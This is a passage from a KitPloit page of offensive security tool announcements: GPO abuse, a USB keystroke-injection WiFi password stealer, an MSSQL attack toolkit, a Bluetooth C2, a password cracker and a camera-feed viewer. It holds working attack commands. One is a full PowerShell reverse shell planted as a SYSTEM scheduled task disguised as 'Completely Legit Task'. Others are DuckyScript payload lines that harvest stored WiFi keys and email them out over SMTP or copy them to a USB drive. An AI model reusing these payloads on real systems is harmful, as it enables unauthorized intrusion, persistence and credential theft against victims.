    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

    By: Zion3R β€” January 17th 2024 at 11:30


    Python partial implementation of SharpGPOAbuse by@pkb1s

    This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

    Default behavior adds a local administrator.


    How to use

    Basic usage

    Add john user to local administrators group (Password: H4x00r123..)

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

    Advanced usage

    Reverse shell example

    ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \
    -user

    Credits



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R β€” January 2nd 2024 at 11:30


    Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

    Β 

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

    Delays

    We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

     Note:

    • After sending data over the email, the .txt file is deleted.

    • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

    For more information about NetworkManager here is some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    ο’‘ Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pantheon - Insecure Camera Parser

    By: Zion3R β€” January 1st 2024 at 11:30


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

    Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
    • Note: I will later add a GUI installer to make it fully indepenent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

    • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

    Ethical Notice

    The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

    By: Zion3R β€” December 19th 2023 at 11:30


    PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


    Install

    PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

    Commands

    All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

    Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

    adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
    agentcmd [PRIV] Execute a system command using agent jobs [I,L]
    agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
    checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
    clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
    columns [NORM] Enumerate columns within a table [I,L]
    databases [NORM] Enumerate databases on a server [I,L]
    disableclr [PRIV] Disable CLR integration [I,L]
    disableole [PRIV] Disable OLE automation procedures [I,L]
    disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
    disablexp [PRIV] Disable xp_cmdshell [I,L]
    enableclr [PRIV] Enable CLR integration [I,L]
    enableole [PRIV] Enable OLE automation procedures [I,L]
    enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
    enablexp [PRIV] Enable xp_cmdshell [I,L]
    impersonate [NORM] Enumerate users that can be impersonated
    info [NORM] Gather information about the SQL server
    links [NORM] Enumerate linked servers [I,L]
    olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
    query [NORM] Execute a custom SQL query [I,L]
    rows [NORM] Get the count of rows in a table [I,L]
    search [NORM] Search a table for a column name [I,L]
    smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
    tables [NORM] Enu merate tables within a database [I,L]
    users [NORM] Enumerate users with database access [I,L]
    whoami [NORM] Gather logged in user, mapped user and roles [I,L]
    xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]

    Usage

    PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

    pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

    View global options:

    pysqlrecon --help

    View command specific options:

    pysqlrecon [GLOBAL_OPTS] COMMAND --help

    Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns rows), with the --database flag.

    Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

    Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

    --link and --impersonate and incompatible.

    Development

    pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

    git clone https://github.com/tw1sm/pysqlrecon
    cd pysqlrecon
    poetry install
    poetry run pysqlrecon --help

    Adding a Command

    PySQLRecon is easily extensible - see the template and instructions in resources

    TODO

    • Add SQLRecon SCCM commands
    • Add Azure SQL DB support?

    References and Credits



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    MacMaster - MAC Address Changer

    By: Zion3R β€” December 18th 2023 at 11:30


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address.
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
      cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help         
    usage: macmaster [-h] [--interface INTERFACE] [--version]
    [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
    -h, --help show this help message and exit
    --interface INTERFACE, -i INTERFACE
    Network interface to change MAC address
    --version, -V Show the version of the program
    --random, -r Set a random MAC address
    --newmac NEWMAC, -nm NEWMAC
    Set a specific MAC address
    --customoui CUSTOMOUI, -co CUSTOMOUI
    Set a custom OUI for the MAC address
    --reset, -rs Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.

    Note

    You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:

    Contact



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

    By: Zion3R β€” December 17th 2023 at 11:30


    NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


    Features

    • Scans multiple IPs, IP ranges, and CIDR blocks.
    • Supports port scanning over TCP and UDP protocols.
    • Detailed banner grabbing feature.
    • Ping check for identifying reachable targets.
    • Multi-threading support for fast scanning operations.
    • Option to save scan results to a file.
    • Provides detailed version information.
    • Colorful console output for better readability.
    • Shodan integration for enhanced scanning capabilities.
    • Configuration file support for Shodan API key.

    Installation

    NetworkSherlock requires Python 3.6 or later.

    1. Clone the repository:
      git clone https://github.com/HalilDeniz/NetworkSherlock.git
    2. Install the required packages:
      pip install -r requirements.txt

    Configuration

    Update the networksherlock.cfg file with your Shodan API key:

    [SHODAN]
    api_key = YOUR_SHODAN_API_KEY

    Usage

    Port Scan Tool positional arguments: target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5, 192.168.1.0/24) options: -h, --help show this help message and exit -p PORTS, --ports PORTS Ports to scan (e.g. 1-1024, 21,22,80, or 80) -t THREADS, --threads THREADS Number of threads to use -P {tcp,udp}, --protocol {tcp,udp} Protocol to use for scanning -V, --version-info Used to get version information -s SAVE_RESULTS, --save-results SAVE_RESULTS File to save scan results -c, --ping-check Perform ping check before scanning --use-shodan Enable Shodan integration for additional information " dir="auto">
    python3 networksherlock.py --help
    usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

    NetworkSherlock: Port Scan Tool

    positional arguments:
    target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
    192.168.1.0/24)

    options:
    -h, --help show this help message and exit
    -p PORTS, --ports PORTS
    Ports to scan (e.g. 1-1024, 21,22,80, or 80)
    -t THREADS, --threads THREADS
    Number of threads to use
    -P {tcp,udp}, --protocol {tcp,udp}
    Protocol to use for scanning
    -V, --version-info Used to get version information
    -s SAVE_RESULTS, --save-results SAVE_RESULTS
    File to save scan results
    -c, --ping-check Perform ping check before scanning
    --use-shodan Enable Shodan integration for additional information

    Basic Parameters

    • target: The target IP address(es), IP range, or CIDR block to scan.
    • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
    • -t, --threads: Number of threads to use.
    • -P, --protocol: Protocol to use for scanning (tcp or udp).
    • -V, --version-info: Obtain version information during banner grabbing.
    • -s, --save-results: Save results to the specified file.
    • -c, --ping-check: Perform a ping check before scanning.
    • --use-shodan: Enable Shodan integration.

    Example Usage

    Basic Port Scan

    Scan a single IP address on default ports:

    python networksherlock.py 192.168.1.1

    Custom Port Range

    Scan an IP address with a custom range of ports:

    python networksherlock.py 192.168.1.1 -p 1-1024

    Multiple IPs and Port Specification

    Scan multiple IP addresses on specific ports:

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

    CIDR Block Scan

    Scan an entire subnet using CIDR notation:

    python networksherlock.py 192.168.1.0/24 -p 80

    Using Multi-Threading

    Perform a scan using multiple threads for faster execution:

    python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

    Scanning with Protocol Selection

    Scan using a specific protocol (TCP or UDP):

    python networksherlock.py 192.168.1.1 -p 53 -P udp

    Scan with Shodan

    python networksherlock.py 192.168.1.1 --use-shodan

    Scan Multiple Targets with Shodan

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

    Banner Grabbing and Save Results

    Perform a detailed scan with banner grabbing and save results to a file:

    python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

    Ping Check Before Scanning

    Scan an IP range after performing a ping check:

    python networksherlock.py 10.0.0.1-10.0.0.255 -c

    OUTPUT EXAMPLE

    $ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-6000
    Threads : 25
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    21 /tcp open telnet 220 (vsFTPd 2.3.4)
    80 /tcp open http HTTP/1.1 200 OK
    139 /tcp open netbios-ssn %SMBr
    25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
    23 /tcp open smtp #' #'
    445 /tcp open microsoft-ds %SMBr
    514 /tcp open shell
    512 /tcp open exec Where are you?
    1524/tcp open ingreslock ro ot@metasploitable:/#
    2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
    3306/tcp open mysql >
    5900/tcp open unknown RFB 003.003
    53 /tcp open domain
    ---------------------------------------------

    OutPut Example

    $ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
    ********************************************
    Scanning target: 10.0.2.1
    Scanning IP : 10.0.2.1
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    53 /tcp open domain
    ********************************************
    Scanning target: 10.0.2.2
    Scanning IP : 10.0.2.2
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    445 /tcp open microsoft-ds
    135 /tcp open epmap
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21- 1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    21 /tcp open ftp 220 (vsFTPd 2.3.4)
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    23 /tcp open telnet #'
    80 /tcp open http HTTP/1.1 200 OK
    53 /tcp open kpasswd 464/udpcp
    445 /tcp open domain %SMBr
    3306/tcp open mysql >
    ********************************************
    Scanning target: 10.0.2.20
    Scanning IP : 10.0.2.20
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

    Contributing

    Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

    By: Zion3R β€” December 10th 2023 at 11:30


    py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


    Installation

    • Via pip

      pip install pyamsi
    • Clone repository

      git clone https://github.com/Tomiwa-Ot/py-amsi.git
      cd py-amsi/
      python setup.py install

    Usage

    dictionary of the format # { # 'Sample Size' : 68, // The string/file size in bytes # 'Risk Level' : 0, // The risk level as suggested by the antivirus # 'Message' : 'File is clean' // Response message # }" dir="auto">
    from pyamsi import Amsi

    # Scan a file
    Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

    # Scan string
    Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

    # Both functions return a dictionary of the format
    # {
    # 'Sample Size' : 68, // The string/file size in bytes
    # 'Risk Level' : 0, // The risk level as suggested by the antivirus
    # 'Message' : 'File is clean' // Response message
    # }
    Risk Level Meaning
    0 AMSI_RESULT_CLEAN (File is clean)
    1 AMSI_RESULT_NOT_DETECTED (No threat detected)
    16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
    20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
    32768 AMSI_RESULT_DETECTED (File is considered malware)

    Docs

    https://tomiwa-ot.github.io/py-amsi/index.html



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BlueBunny - BLE Based C2 For Hak5's Bash Bunny

    By: Zion3R β€” December 7th 2023 at 11:30


    C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
    Send your Bash Bunny all the instructions it needs just over the air.

    Overview

    Structure


    Installation & Start

    1. Install required dependencies
    pip install pygatt "pygatt[GATTTOOL]"

    Make sure BlueZ is installed and gatttool is usable

    sudo apt install bluez
    1. Download BlueBunny's repository (and switch into the correct folder)
    git clone https://github.com/90N45-d3v/BlueBunny
    cd BlueBunny/C2
    1. Start the C2 server
    sudo python c2-server.py
    1. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
    2. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).

    Manual communication with the Bash Bunny through Python

    You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

    Example Code

    # Import the backend (BlueBunny/C2/BunnyLE.py)
    import BunnyLE

    # Define the data to send
    data = "QUACK STRING I love my Bash Bunny"
    # Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
    d_type = "cmd"

    # Initialize BunnyLE
    BunnyLE.init()

    # Connect to your Bash Bunny
    bb = BunnyLE.connect()

    # Send the data and let it execute
    BunnyLE.send(bb, data, d_type)

    Troubleshooting

    Connecting your Bash Bunny doesn't work? Try the following instructions:

    • Try connecting a few more times
    • Check if your bluetooth adapter is available
    • Restart the system your C2 server is running on
    • Check if your Bash Bunny is running the BlueBunny payload properly
    • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

    Bugs within BlueZ

    The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.

    • Timeout after 5.0 seconds
    • Unknown error while scanning for BLE devices

    Working on...

    • Remote shell access
    • BLE exfiltration channel
    • Improved connecting process

    Additional information

    As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PassBreaker - Command-line Password Cracking Tool Developed In Python

    By: Zion3R β€” December 6th 2023 at 11:30


    PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.Β 

    Features

    • Wordlist-based password cracking
    • Brute force password cracking
    • Support for multiple hash algorithms
    • Optional salt value
    • Parallel processing option for faster cracking
    • Password complexity evaluation
    • Customizable minimum and maximum password length
    • Customizable character set for brute force attacks

    Installation

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/PassBreaker.git
    2. Install the required dependencies:

      pip install -r requirements.txt

    Usage

    python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

    Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

    Options

    • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
    • -s, --salt <salt>: Specify a salt value to use.
    • -p, --parallel: Enable parallel processing for faster cracking.
    • -c, --complexity: Evaluate password complexity before cracking.
    • -b, --brute-force: Perform a brute force attack.
    • --min-length <min_length>: Set the minimum password length for brute force attacks.
    • --max-length <max_length>: Set the maximum password length for brute force attacks.
    • --character-set <character_set>: Set the character set to use for brute force attacks.

    Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım ârneği:

    Usage Examples

    Wordlist-based Password Cracking

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

    This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

    Brute Force Attack

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

    This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

    Password Complexity Evaluation

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

    This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

    Using Salt Value

